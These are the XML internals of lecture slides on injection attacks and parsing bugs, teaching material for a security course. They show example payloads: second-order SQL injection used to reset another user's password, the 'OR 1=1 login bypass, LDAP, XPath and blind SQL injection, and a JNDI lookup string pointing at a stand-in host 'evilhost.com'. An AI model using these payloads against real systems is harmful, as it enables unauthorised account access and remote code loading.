                  <a:pt x="1472813" y="393215"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1465833" y="525838"/>
                  <a:pt x="1521673" y="891133"/>
                  <a:pt x="1458852" y="916727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1396031" y="942321"/>
                  <a:pt x="1170339" y="545616"/>
                  <a:pt x="1095884" y="546779"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1021429" y="547942"/>
                  <a:pt x="974895" y="828312"/>
                  <a:pt x="1012122" y="923707"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1049349" y="1019102"/>
                  <a:pt x="1286675" y="1050513"/>
                  <a:pt x="1319249" y="1119151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1351823" y="1187789"/>
                  <a:pt x="1308779" y="1292492"/>
                  <a:pt x="1207567" y="1335536"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1106355" y="1378580"/>
                  <a:pt x="822495" y="1398357"/>
                  <a:pt x="711976" y="1377417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="601457" y="1356477"/>
                  <a:pt x="529328" y="1285511"/>
                  <a:pt x="544452" y="1209893"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="559576" y="1134275"/>
                  <a:pt x="739897" y="994672"/>
                  <a:pt x="802718" y="923707"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="865539" y="852742"/>
                  <a:pt x="934177" y="828312"/>
                  <a:pt x="921380" y="784104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="908583" y="739896"/>
                  <a:pt x="795737" y="652644"/>
                  <a:pt x="725936" y="658461"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="656135" y="664278"/>
                  <a:pt x="577026" y="775961"/>
                  <a:pt x="502571" y="819005"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="428116" y="862049"/>
                  <a:pt x="362968" y="902767"/>
                  <a:pt x="279206" y="916727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195444" y="930687"/>
                  <a:pt x="97722" y="916726"/>
                  <a:pt x="0" y="902766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5" name="Rechthoek 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5354084" y="3712325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20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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> order SQL injection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Suppose I want to access Lejla's account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 register an account for myself with the name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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lejla' -- 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 log in as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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lejla' -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>and change my password 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If the password change is done with the SQL statement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users                   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SET password='abcd1234'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username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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lejla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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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password='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nl-NL" sz="1800" dirty="0"/>
              <a:t>then I have reset Lejla's password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>Here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abcd1234 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>is user input, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the dangerous input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from the server's own database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>where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was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>earlier</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>The moral of the story:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any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r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input, not even data coming from sources you think can trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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2121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High level observation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> features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There are two ways for software to go off the rails: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457200">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the input triggers a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the input triggers a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>feature                                                     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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>         Of course, it is then a bug that this feature is exposed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>         This can be due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>broken/missing access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> includes the so-called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicParenR"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244551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CFE86EA-00AD-05C1-490C-4A5CB6E0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bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> features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137CEC22-F4A3-F07D-1A4A-E769D82DC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44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EE1EE47F-C787-C2F9-10BD-6AF163C8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445" y="3545640"/>
            <a:ext cx="342576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(abuse of) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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 feature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="254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215DF96-54D4-96BE-2A46-CE7E8E936A84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3721B7CF-A1C4-DBC4-B99F-0484389AE2FD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1C9560ED-C605-09AA-6205-C84F7ABAA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9B7E9076-9CD5-E28F-D66B-6060186CE417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A3C982C-5723-114C-574E-0CBB29254EA1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4DA1E3F0-AB73-5874-A37C-C3076D9FC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25CDB298-4380-2627-DF9B-E49CEE698793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4FBC4E34-8A67-99DD-72C6-BA0B1206C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65B3739-01DE-3913-F067-A5DEA171F1F5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33BDD35-0774-9BA8-7BFB-4E26B2589320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EFDBDD81-AB01-566C-4991-0BA85496C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73B1C2DB-A189-0887-B7EC-B7BA7E03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0F90E4A1-C978-6D36-0C03-62512B8A239C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6065280" cy="1710720"/>
            <a:chOff x="1198642" y="989203"/>
            <a:chExt cx="6685645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C5538B2F-3BCC-9EE7-ABE4-DBBE252F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AE7D04F8-5C93-6E8F-3D10-CDD52A515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57745AE6-78C1-F9C6-3070-6082D584B49F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43A142C9-6E18-F263-7692-C122CEEEE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C6EA1F6A-C8DB-0669-86EA-CE74C19E5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2222717" cy="47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71FA4DDA-4550-D8EB-4956-EF6E65321FC1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68365DF-7975-DEBC-BBB3-8E3E8BA34D49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4A69C1A-D2A0-4F12-4082-0C7E0EACEE8E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2BBB5388-B58A-0C18-8C13-351D8A145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Recurring themes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>parsing &amp; languages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Processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> an input begins with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parsing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depends on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input language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format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protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP/IP packets, HTTP, HTML, X509, mp3, JPEG, PDF, URL,    email address, Word, Excel, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input handling bugs often come down to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parsing bugs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buggy parsing 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buffer overflow in PDF parsing)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unintended parsing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parsing user input as SQL command)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96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(1)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cause security bugs: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/>
              <a:t>esp. if parser is written in memory unsafe language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory corruption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>can lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory leaks,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RCE, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>even parser written in memory safe language can still </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crash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If the data being parsed is input, these bugs are exploitable!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input formats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP/IP, 2/3/4/5G,  Bluetooth, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, JPEG, PDF, HTML, Word, ...  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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 examples from the fuzzing lecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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671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(2)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also cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mis-interpretation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For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  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www.paypal.com\0.mafia.com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sz="1800" dirty="0"/>
              <a:t>in X.509 certificate                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Name  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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paypal.com,mafia.com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in X.509 certificate</a:t>
            </a:r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For which domain is this JDNI loop-up?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${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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jndi:ldap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://127.0.0.1#.evilhost.com:1389/a}</a:t>
            </a:r>
          </a:p>
          <a:p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Aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parser differentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: two applications parse the same data differently, leading to exploitable misunderstandings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poorly specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats 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NL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531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(3)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Correct but intended parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>can also cause security problems, esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> parsing (and processing) of user input </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as SQL command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as file path  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as OS command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as HTML or JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>....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EXPRESSIVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats/language</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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63923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Typical injection attack,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SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400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F6ECECB-7A1A-4B54-B508-939C5DAF405F}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16390" name="Groep 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="694017" y="2585035"/>
            <a:ext cx="7475959" cy="2706909"/>
            <a:chOff x="915240" y="4427754"/>
            <a:chExt cx="8241563" cy="2983876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6934100" y="5967151"/>
              <a:ext cx="2222703" cy="1444479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Back-end service, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB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 database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Explosie 2 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6753212" y="5905136"/>
              <a:ext cx="770158" cy="565861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pic>
          <p:nvPicPr>
            <p:cNvPr id="16404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0" y="4735048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057827" y="4973788"/>
              <a:ext cx="1457199" cy="3304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637262" y="4427754"/>
              <a:ext cx="2178811" cy="298387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630027" y="5898872"/>
              <a:ext cx="1465509" cy="491085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104328" y="605552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5224" y="4246849"/>
            <a:ext cx="1965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5640368" y="4059842"/>
            <a:ext cx="144000" cy="16128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Vrije vorm 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3189277" y="3090281"/>
            <a:ext cx="1807646" cy="1985870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Lijnbijschrift 1 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1242828" y="1357725"/>
            <a:ext cx="1737238" cy="415091"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 97628"/>
              <a:gd name="adj2" fmla="val 38859"/>
              <a:gd name="adj3" fmla="val 443557"/>
              <a:gd name="adj4" fmla="val 5828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’OR 1=1;--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Lijnbijschrift 1 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4575129" y="1249665"/>
            <a:ext cx="3956142" cy="1129569"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 98752"/>
              <a:gd name="adj2" fmla="val 37862"/>
              <a:gd name="adj3" fmla="val 241807"/>
              <a:gd name="adj4" fmla="val 25926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SELECT * FROM </a:t>
            </a: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Username = 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OR 1=1;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1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AND Password = ’1234’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="18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F216-BEC1-1CD9-61F7-60A3F042052D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261949" y="5633135"/>
            <a:ext cx="702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Is this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input problem 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or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output problem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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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3200" dirty="0"/>
              <a:t>Threat modelling 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434376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134672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General recipe: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user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is combined with other data and forwarded to &amp; processed by some back-end API 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lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>structured output generation vulnerability  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Piessens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Tell-tale sign 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>special characters or keywords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&lt; &gt; \ &amp;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Tell-tale sign 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use of 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strings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157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LDAP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/>
              <a:t>An LDAP query sent to the LDAP server to authenticate a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/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abcd1234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)) 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can be corrupted by giving as username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dirty="0"/>
              <a:t>which results in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admin)(&amp;))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PASSWD=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where only first part is used,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>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is LDAP notation for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fld id="{AF2AEC77-7434-46CA-BE34-C63E21E2B0BF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11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XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1"/>
              <a:t>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XML data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>, 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student_database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jan&lt;/username&gt;&lt;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&gt;abcd1234&lt;/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kees&lt;/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nameuser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&lt;/student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en-GB" dirty="0"/>
              <a:t>can be accessed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XPath queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eg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(//student[username/text()='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/text()='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abcd123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']/account/text())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nl-NL" sz="1800" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>which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can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be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corrupted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by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malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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or '1'='1'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0598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Blind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SQL injection attack with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http://a.com/xyz?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sid</a:t>
            </a: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=s1232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AND SUBSTRING(user,1,1)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(Lack of) an error response reveals if username starts with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In a blind injection attack, we’re only interested in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>leakage of information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  the database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, not in the effect of the query (e.g. to corrupt data in database) or the actual response (e.g. to leak data from database).   </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33993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65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The class of injection attacks is bigger than you may realise: </a:t>
            </a:r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format string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%n, %s, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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serialised data representation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macros: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Word &amp; Excel containing Visual Basic (VBA)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or other weird Office ‘features’!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>PDFs containing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
